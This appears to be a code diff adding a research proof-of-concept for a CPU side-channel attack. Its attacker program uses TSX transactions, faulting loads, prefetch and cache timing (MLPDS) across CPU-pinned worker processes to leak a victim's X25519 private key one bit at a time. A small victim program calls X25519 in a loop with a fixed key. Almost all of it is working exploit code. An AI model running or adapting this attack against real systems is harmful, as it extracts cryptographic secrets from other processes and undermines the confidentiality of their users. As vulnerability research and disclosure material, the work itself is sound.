+// Tests whether a transient load yields the 64-bit value `prefix`.
+//
+// prefix is XORed with probe1_addr up front, so inside the transaction
+// (loaded ^ prefix) equals probe1's address exactly when the loaded value
+// matches the caller's prefix; the prefetch then touches probe1.
+//
+// probe1 is flushed first, the transactional sequence is attempted 32 times,
+// and finally probe1 is timed.
+//
+// Returns 0 if probe1 is measured as cached afterwards, -1 otherwise.
+static int mlpds(unsigned long prefix) {
+  prefix ^= probe1_addr;
+  _mm_clflush(probe1);
+  _mm_mfence();
+  _mm_sfence();
+  _mm_lfence();
+  asm volatile("CPUID"::: "eax","ebx","ecx","edx", "memory");
+
+
+  // TODO find optimal number of iterations.
+  for (int i = 0; i < 32; i++) {
+  asm volatile(
+      ".align 64\n\t"
+      "0:\n\t"
+      "clflush [%0]\n\t"
+      "sfence\n\t"
+      // idk why, helps speed up
+      "xbegin 2f\n\t"          // an abort resumes at label 2
+
+      //xbegin block:
+      // Load from address -1. NOTE(review): presumably this always faults
+      // and aborts the transaction -- confirm.
+      "mov   rax, [-1]\n\t"
+      "xor   rax, %1\n\t"
+      "prefetchnta [rax]\n"
+
+      "xend\n\t"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      // Spins forever if execution ever gets here without an abort.
+      "3: jmp 3b\n"
+      "2:\n\t"
+      //"dec r15\n\t"
+      //"jne 0b\n\t"
+      :
+      : "r" (probe3), "r"(prefix)
+      : "rax");
+  }
+
+  int p1 = is_cached(probe1);
+  if (p1) { return 0; }
+  return -1;
+}
+
+
+// Maps one page each for probe1 and probe3 at their fixed addresses and
+// fills them with 0x99 so the pages are actually backed. Exits via err() if
+// a mapping does not land at the requested address.
+void map() {
+  const int prot = PROT_READ|PROT_WRITE;
+  const int flags = MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE;
+  const size_t page_len = 4096;
+  void *got;
+
+  got = mmap(probe1, page_len, prot, flags, -1, 0);
+  if (got != probe1) {
+    err(1, "mmap(probe1)");
+  }
+  memset(probe1, 0x99, page_len);
+
+  got = mmap(probe3, page_len, prot, flags, -1, 0);
+  if (got != probe3) {
+    err(1, "mmap(probe3)");
+  }
+  memset(probe3, 0x99, page_len);
+}
+
+// Prints the 32 bytes at `secret` as space-separated two-digit hex on one
+// line.
+void print_secret(unsigned char* secret) {
+  const unsigned char* const end = secret + 32;
+  printf("Secret:");
+  for (const unsigned char* p = secret; p != end; ++p) {
+    printf(" %02x", *p);
+  }
+  printf("\n");
+}
+
+// Sets bit number `bit` of the little-endian byte array `privkey` to `to`
+// (expected to be 0 or 1). Negative bit numbers are ignored.
+void set_bit(uint8_t* privkey, int bit, int to) {
+  if (bit >= 0) {
+    uint8_t* cell = &privkey[bit / 8];
+    const int shift = bit & 7;
+    *cell = (*cell & ~(1 << shift)) | (to << shift);
+  }
+}
+
+int X25519_fake(uint8_t* out, const uint8_t* privkey,
+                const uint8_t* peer_pubkey, int iteration);
+
+void X25519_public_from_private(uint8_t out_public_value[32],
+                                const uint8_t private_key[32]);
+
+#define MARGIN 3
+#define CPU_NUM 6
+
+size_t poss[4][5];
+
+// Sends SIGKILL to `pid` and waits for it, so the child is reaped before
+// this returns. Failures of either call are ignored.
+void do_kill(int pid) {
+  (void)kill(pid, SIGKILL);
+  (void)waitpid(pid, NULL, 0);
+}
+
+// Body of a worker process; never returns.
+//
+// Maps the probe pages in this process, then loops forever over the 4x5
+// candidate qwords in the global `poss` table, bumping the matching counter
+// in the shared page whenever mlpds() reports a hit.
+//
+// shmem: shared page, used as unsigned short[4 * 5] indexed by k * 5 + wq.
+void run_child(void* shmem) {
+  map();
+  unsigned short* results = (unsigned short*) shmem;
+  while (1) {
+    for (int k = 0; k < 4; k++) {
+      for (int wq = 0; wq < 5; wq++) {
+        int byte = mlpds(poss[k][wq]);
+        if (byte != -1) {
+          // Several workers share these counters; a plain ++ is a
+          // read-modify-write and can drop hits when two of them collide.
+          __atomic_fetch_add(&results[k * 5 + wq], 1, __ATOMIC_RELAXED);
+          printf("[pid %d] res: %d for [%d][%d]\n", getpid(), byte, k, wq);
+        }
+      }
+    }
+  }
+}
+
+// Kills and reaps the first `count` workers recorded in `pids`.
+static void kill_workers(const int* pids, int count) {
+  for (int j = 0; j < count; j++) {
+    do_kill(pids[j]);
+  }
+}
+
+// Forks one worker per CPU index 0..CPU_NUM-1 and pins each to its CPU.
+//
+// A CPU for which sched_setaffinity() fails with EINVAL is skipped (its
+// worker is killed). Any other failure is fatal; every worker created so far
+// is killed first so none is left spinning after the parent exits.
+//
+// pids, affin: out arrays receiving the pid and CPU index of each surviving
+//              worker; must hold at least CPU_NUM entries.
+// shmem:       shared counter page handed to run_child().
+//
+// Returns the number of workers left running.
+int fork_children(int* pids, int* affin, void* shmem) {
+  int count = 0;
+  for (int i = 0; i < CPU_NUM; i++) {
+    // Workers are only ever SIGKILLed; flush so they do not inherit (and
+    // later re-emit) output still sitting in the parent's stdio buffer.
+    fflush(stdout);
+    int pid = fork();
+    if (pid == -1) {
+      int saved_errno = errno;
+      kill_workers(pids, count);
+      errno = saved_errno;
+      err(1, "could not fork");
+    }
+    if (pid == 0) {
+      run_child(shmem);
+    }
+    pids[count] = pid;
+    affin[count] = i;
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(i, &set);
+    int error = sched_setaffinity(pid, sizeof(set), &set);
+    if (error) {
+      // Capture errno now: the calls below may overwrite it.
+      int saved_errno = errno;
+      if (saved_errno == EINVAL) {
+        do_kill(pid);
+        printf("Affinity %d does not work, killing temporary process.\n", i);
+      }
+      else {
+        do_kill(pid);
+        kill_workers(pids, count);
+        printf("err %d\n", error);
+        errno = saved_errno;
+        err(1, "sched_setaffinity");
+      }
+    }
+    else {
+      printf("Created new child, pid = %d, affinity = core %d\n", pid, i);
+      count++;
+    }
+  }
+  return count;
+}
+
+// Returns 1 when process `pid` is pinned to exactly one CPU and that CPU is
+// `aff`, 0 otherwise. Exits via err() if the affinity cannot be read.
+int affinity_valid(int pid, int aff) {
+  cpu_set_t allowed;
+  const int rc = sched_getaffinity(pid, sizeof(allowed), &allowed);
+  if (rc < 0) {
+    err(1, "sched_getaffinity");
+  }
+  if (CPU_COUNT(&allowed) != 1) {
+    return 0;
+  }
+  return CPU_ISSET(aff, &allowed) != 0;
+}
+
+// Recovers key bit `iteration` using worker processes.
+//
+// Fills the global `poss` table with the 40-byte intermediate value
+// X25519_fake() produces for each of the four settings of key bits
+// (iteration, iteration-1), forks workers that probe those qwords, and
+// samples their shared hit counters every 100 ms. A sample is only used when
+// every worker is still pinned to its CPU; otherwise all workers are killed
+// and re-forked. Sampling stops once the totals for "bit = 0" and "bit = 1"
+// differ by at least MARGIN.
+//
+// On return privkey has bit `iteration` set to the decision and bit
+// `iteration-1` cleared; the workers are killed and the shared page is
+// unmapped.
+void do_iteration(int iteration, uint8_t* privkey, uint8_t* pubkey) {
+  uint8_t out[40];
+  unsigned short results[4][5] = {0};
+  _Static_assert(sizeof(poss[0]) == sizeof(out),
+                 "a candidate row must hold the whole 40-byte ladder value");
+
+  // iteration - 2 if you want to look at two bits.
+  // iteration - 1 if you want to look at one bit.
+  int x_it = iteration - 1;
+  if (x_it < 0) x_it = 0;
+
+  // Candidate k encodes (bit[iteration], bit[iteration-1]) = (k >> 1, k & 1).
+  // One ladder run per candidate yields all five qwords; memcpy avoids
+  // reading the byte buffer through a size_t pointer.
+  for (int k = 0; k < 4; k++) {
+    set_bit(privkey, iteration, k >> 1);
+    set_bit(privkey, iteration-1, k & 1);
+    X25519_fake(out, privkey, pubkey, x_it);
+    memcpy(poss[k], out, sizeof(poss[k]));
+  }
+
+  printf("iter=%d\nTargets:\n", iteration);
+  for (int i = 0; i < 5; i++) {
+    for (int j = 0; j < 4; j++) {
+      printf("%016zx ", poss[j][i]);
+    }
+    printf("\n");
+  }
+  int diff_abs = 0;
+  int bit = 0;
+  int num_children = 0;
+  int pids[1024];
+  int affin[1024];
+  void* shmem;
+  shmem = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+  if (shmem == MAP_FAILED) {
+    err(1, "shared memory alloc failed");
+  }
+
+  do {
+    if (num_children == 0) {
+      // (Re)start the workers and give them time to come up.
+      num_children = fork_children(pids, affin, shmem);
+      memset(shmem, 0, sizeof(results));
+      usleep(100 * 1000);
+    }
+    // Collect one 100 ms sample.
+    memset(shmem, 0, sizeof(results));
+    usleep(100 * 1000);
+    unsigned short results_temp[4][5] = {0};
+    memcpy(results_temp, shmem, sizeof(results_temp));
+    memset(shmem, 0, sizeof(results));
+    int all_good = 1;
+    for (int i = 0; i < num_children; i++) {
+      all_good &= affinity_valid(pids[i], affin[i]);
+    }
+    if (all_good) {
+      for (int wq = 0; wq < 5; wq++) {
+        for (int ij = 0; ij < 4; ij++) {
+          results[ij][wq] += results_temp[ij][wq];
+        }
+      }
+
+      int sums[4] = {0};
+      for (int wq = 0; wq < 5; wq++) {
+        for (int ij = 0; ij < 4; ij++) {
+          sums[ij] += results[ij][wq];
+        }
+        printf("%d %d | %d %d\n", results[0][wq], results[1][wq], results[2][wq], results[3][wq]);
+      }
+
+      // Candidates 0 and 1 have bit[iteration] = 0; 2 and 3 have it set.
+      int x0 = sums[0] + sums[1];
+      int x1 = sums[2] + sums[3];
+      diff_abs = x0 - x1;
+      if (diff_abs < 0) diff_abs = -diff_abs;
+      bit = x1 > x0;
+      printf("--- diff_abs %d (%d vs. %d, total %d)\n", diff_abs, x0, x1, x0+x1);
+    }
+    else {
+      printf("Killing children - affinity changed.\n");
+      for (int i = 0; i < num_children; i++) {
+        do_kill(pids[i]);
+      }
+      num_children = 0;
+    }
+  } while (diff_abs < MARGIN);
+  printf("Killing children as we leaked the bit.\n");
+  for (int i = 0; i < num_children; i++) {
+    do_kill(pids[i]);
+  }
+  // This function runs once per key bit; without this every call would leave
+  // its shared page mapped.
+  if (munmap(shmem, 4096) != 0) {
+    err(1, "munmap(shmem)");
+  }
+  set_bit(privkey, iteration-1, 0);
+  set_bit(privkey, iteration, bit);
+  print_secret(privkey);
+}
+
+// Recovers the victim's X25519 private key bit by bit.
+//
+// Reads a 32-byte client private key (hex bytes) from stdin, derives the
+// matching public key, optionally resumes from /tmp/checkpoint (an iteration
+// number followed by 32 hex key bytes), then calls do_iteration() for every
+// ladder iteration from the start iteration down to 3. Finally clears the
+// low three key bits and prints the key.
+//
+// Both parameters are unused.
+void stage3(size_t secret_offset, size_t saved_rbp) {
+  (void)secret_offset;
+  (void)saved_rbp;
+
+  uint8_t pubkey[32];
+  uint8_t client_privkey[32];
+  printf("Input client private key:\n");
+  for (int i = 0; i < 32; i++) {
+    unsigned int n;
+    // A short or malformed input would otherwise leave `n` uninitialized.
+    if (scanf("%x", &n) != 1) {
+      errx(1, "expected 32 hex bytes for the client private key");
+    }
+    client_privkey[i] = n;
+  }
+  X25519_public_from_private(pubkey, client_privkey);
+  uint8_t privkey[32] = {0};
+  privkey[31] &= 127;
+  privkey[31] |= 64;
+  // The algorithm starts at that iteration.
+  int start_iteration = 253;
+
+  // Check if checkpoint available.
+  FILE* f = fopen("/tmp/checkpoint", "r");
+  if (!f) {
+    printf("Starting from scratch.\n");
+  }
+  else {
+    printf("Starting from checkpoint.\n");
+    // set_bit() indexes privkey[iteration / 8], so anything above 255 would
+    // write past the 32-byte key.
+    if (fscanf(f, "%d", &start_iteration) != 1 || start_iteration > 255) {
+      errx(1, "malformed /tmp/checkpoint: bad iteration");
+    }
+    for (int i = 0; i < 32; i++) {
+      unsigned int n;
+      if (fscanf(f, "%x", &n) != 1) {
+        errx(1, "malformed /tmp/checkpoint: expected 32 hex key bytes");
+      }
+      privkey[i] = n;
+    }
+    fclose(f);
+  }
+
+  print_secret(privkey);
+
+  // Ending on iteration 3, since bits 2, 1 and 0 are unset.
+  for (int iteration = start_iteration; iteration >= 3; iteration--) {
+    do_iteration(iteration, privkey, pubkey);
+  }
+  privkey[0] &= 248;
+  print_secret(privkey);
+}
+
+// Starts the key-recovery loop. The probe pages are mapped by each worker
+// (run_child), not here; stage3() ignores both of its arguments.
+void run() {
+  stage3(0, 0);
+}
+
+// Program entry point: runs the attack.
+int main() {
+  run();
+  return 0;
+}
+
diff --git a/pocs/cpus/mds-x25519/x25519_victim.c b/pocs/cpus/mds-x25519/x25519_victim.c
new file mode 100644
index 00000000..30de7045
--- /dev/null
+++ b/pocs/cpus/mds-x25519/x25519_victim.c
@@ -0,0 +1,24 @@
+#include <stdint.h>
+#include <stdio.h>
+
+int X25519(uint8_t out_shared_key[32],
+           const uint8_t private_key[32],
+           const uint8_t peer_public_value[32]);
+void X25519_public_from_private(uint8_t out_public_value[32],
+                                const uint8_t private_key[32]);
+
+// Victim for the MLPDS demo: prints the public key derived from the fixed
+// client private key 01 02 ... 20, then calls X25519() with a fixed secret
+// key in an endless loop. Never returns.
+int main() {
+  const uint8_t* priv = (const uint8_t*)"privtest12345678somemorebitsABCD";
+
+  // Client private key bytes are 1, 2, ..., 32.
+  uint8_t clientpriv[32];
+  for (int idx = 0; idx < 32; idx++) {
+    clientpriv[idx] = (uint8_t)(idx + 1);
+  }
+
+  uint8_t pub[32];
+  X25519_public_from_private(pub, clientpriv);
+  for (const uint8_t* p = pub; p != pub + 32; ++p) {
+    printf("%02x ", *p);
+  }
+  printf("\n");
+
+  uint8_t out[32];
+  for (;;) {
+    X25519(out, priv, pub);
+  }
+}